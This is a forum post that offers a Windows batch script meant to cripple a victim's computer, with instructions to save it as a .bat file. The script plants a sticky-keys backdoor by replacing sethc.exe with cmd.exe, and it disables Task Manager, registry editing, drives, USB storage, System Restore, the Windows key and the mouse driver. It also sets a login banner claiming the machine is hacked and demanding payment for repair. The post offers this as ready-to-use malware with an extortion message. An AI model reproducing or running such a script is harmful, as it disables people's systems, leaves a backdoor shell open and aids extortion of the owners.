Jump to content
Skream Example

Make windows a HELL

Recommended Posts

Below is the batch script which edits registry forcefully and make some unwanted changes in windows, which finally makes the person mad n format the system. Copy and Paste the below code to notepad n save as .bat

@ECHO OFF
REM adding the system prompt at the login time
cd\
cd windows\system32
copy cmd.exe d:
d:
ren cmd.exe sethc.exe
echo y|copy sethc.exe c:\windows\system32\
del sethc.exe

REM removing folder options from user panel
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REM removing folder options from machnie
REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REM disabling task manager
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

REM disabling the run bar
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

REM disabling the noclose option
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

REM disabling the NoFind(search) option
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

REM disabling the all drives from user seeing
REG add HKCU\software\microsoft\windows\currentversion\policies\explorer /v NoDrives /t REG_DWORD /d 0x3ffffff /f

REM disabling the desktop
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f

REM adding the legal caption at the start up
REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "YOUR COMPUTER IS HACKED BY Crazy009" /f

REM adding the text in the legal caption value at start up
REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "HEY DUDE,HOW ARE YOU ???? HOPEFULLY YOU ARE NOT FINE AS YOUR COMPUTER IS HACKED BY ME.ACTUALLY YOU MUST GIVE RESPECT TO THE HACKERS,THESE GUYS ARE BRILLIANT AND BLAH,BLAH......OH DONT CRY FOR YOUR SYSTEM.I CAN REPAIR IT,FOR THAT PAY ME,CONTACT: indishell.crazy009@gmail.com" /f

REM Hacking the Internet Explorer
REM Making the toolbar kewl
REG add "HKCU\Software\Microsoft\Internet Explorer\Toolbar" /v BackBitmap /t REG_SZ /d c:\Windows\Web\Wallpaper\Bliss.bmp /f

REM Changing the Caption of IE
REG add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "HACKED BY ANKIT CHAUHAN" /f

REM removing the user name from start menu
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

REM removing all-programs option from start menu
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

REM locking the taskbar
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 1 /f

REM blocking usb ports
REG add HKLM\System\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f

REM disabling system restore point
REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

REM disabling the windows key
REG add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000300000000005be000005ce000000000 /f

REM changing the wallpaper
REG add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Windows\Web\Wallpaper\Azul.jpeg /f

REM disabling the editing of registry
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

REM editing the boot file with no guiboot
bootcfg /addsw /ng /id 1

REM Swapping of Mouse Button Functions
rundll32 user32.dll,SwapMouseButton

REM TO DISABLE THE MOUSE
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Don't run on your own system

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...